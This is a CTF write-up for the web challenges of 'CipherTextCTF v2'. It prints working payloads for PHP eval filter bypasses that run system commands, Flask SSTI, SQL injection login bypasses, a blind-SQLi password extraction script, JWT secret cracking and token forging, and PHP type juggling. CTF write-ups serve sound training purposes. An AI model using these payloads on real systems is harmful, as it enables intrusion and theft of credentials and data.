CTF WriteupsJoepardy

CipherTextCTF v2 Writeups Web

BabyPHP Level 1


the challenge is basic , it get input using php wrapper php://input in post request body then unserialize compare num variable with “13622”
so the payload will be like this: a:1:{s:3:”num”;i:13622;}

Flag: CTCTF{B4by_Php_l3v3L_1_P4s53d}

BabyPHP Level 2


First we need to analyze the code , it take POST request with cmd parameter and can’t have more than two consecutive letter and no dots (.) or opening square brace ( [ ) also cmd should be less than 100 character.

If we pass the check , we can run eval!
the challenge can be solved in two way , or two techniques ( maybe more depend on your php skills )

First Method (PHP Variable Variables):

We need to list files

Payload: $c='sy';%0a$$c='st';%0a$$$c='em';%0a$d="$c${$c}${$$c}";%0a$d('ls');

Read flag mysecretflag2020ctctf_2020.txt ( easy way )
    $$e='t ';

Payload: $e="ca";%0a$$e="t%20";%0a$$$e="m*";%0a$c="sy";%0a$$c="st";%0a$$$c="em";%0a$d="$c${$c}${$$c}";%0a$d("$e${$e}${$$e}");
Flag: CTCTF{b4By_PhP_l3v3L_2_D0n3!!}

Second Method ( PHP Mulitline String):

Listing files 
        sy$b$a // system
        ?><?=$A($B)?> // <?= "test" ?> === <?php echo "test" ?>

Payload: $a=em;%0a$b=st;%0a$A=<<<Z%0asy$b$a%0aZ;%0a$B=ls;%0a?><?=$A($B)?>
    Reading flag:

Payload: $a='em';%0a$b='st';%0a$A=<<<Z%0asy$b$a%0aZ;%0a$c='t%20';%0a$e='m*';%0a$B=<<<Z%0aca$c$e%0aZ;%0a$A($B);
Flag: CTCTF{b4By_PhP_l3v3L_2_D0n3!!}

Recipes Blog


we have a simple blog and have a search bar , if you type “test” , it will reflect to us .

so if we try SSTI Flask payload “{{ 7*’7′ }}” it will return 7777777

we can check configuration by typing “{{ config.items() }}”

Flag: CTCTF{Fl4sk_SSt1_N3v3r_Die!!}


after making directory bruteforce , there’s wordpress in /secret , so when we run wpscan there’s a plugin vulnerable to LFI , flag in /home/ctctf/flag.txt



sqli101 has a filter in all comments and “=” , so we can try to login to admin account by typing ( admin’or’1′<‘2 )



sqli102 has filter in space and all commments , you can solve it in multible way and it’s blind sql injection , bypassing commments can be done with (‘%09’, ‘%0A’, ‘%0C’, ‘%0D’, ‘%0B’, ‘%a0’, ‘()’ ) , and i decied to solve it with ‘()’

Payload: admin’and(ascii(substr((select(password)from(users)where(username=”admin”)),1,1))>1)and’1’=’1

import requests
from pwn import *
import string

url = ""

flag = ""
length = 1
letters = string.printable

while length<70:
	for i in letters:
		payload = """admin'and(ascii(substr((select(password)from(users)where(username="admin")),{},{}))={})and'1'='1""".format(str(length),str(length),ord(i))
		response = requests.post(url,data={"username":payload,"password":"ss","login":"Login"})
		if "Correct" in response.text:
			flag += i
	length += 1
print flag

Flag: CTCTf{ClouD_Y0u_eXpl41n_h0W_Bl1nd_5ql_inj3ct10n_w0rK_MaNu4l?}


First we have a login page and we need a valid creds ,(no sql injection) . valid creds ( guest:guest )

after login we can see there’s JWT token assigned we can see there’s attribute called userid , so we need to crack jwt secret


python3 jwtcat.py -t eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyaWQiOiJiZjU1YjYzNjI0NGM1OTc5NzA2ODBiOWNlMmZkZmUwNyIsImlhdCI6MTU4ODE2MjcyNH0.dgt5rsnCHRgs3P7SbDyZRfxDJGW766rc-UUk_8U3hEc -w /root/Desktop/HTB/rockyou.txt

secret key: aciddezoxiribonucleic

now let’s see the userid , userid: bf55b636244c597970680b9ce2fdfe07 it’s reversed md5 (17) , so you can write a code to bruteforce from 1 to any number .
admin userid is (108) -> md5 -> reverse , and generate jwt with secret key to send request with it .

Flag: CTCTF{Br43k1nG_J50n_W3b_T0k3n}



The idea is we cann’t borrow more than 500 and flag is 1337, but when we buy flag or any item there’s CSRF token and this token have the balance .


so we can edit the balance and send request to buy the flag

{“username”:”m4rv3l”,”balance”:5000,”timestamp”:1588170035} -> base64

Bypass Me


PHP Type Juggling , we can user post parameter as array to give true and the value different to give true for check .

Payload: username[]=a&password[]=b

Related Articles

Leave a Reply

Your email address will not be published. Required fields are marked *

Back to top button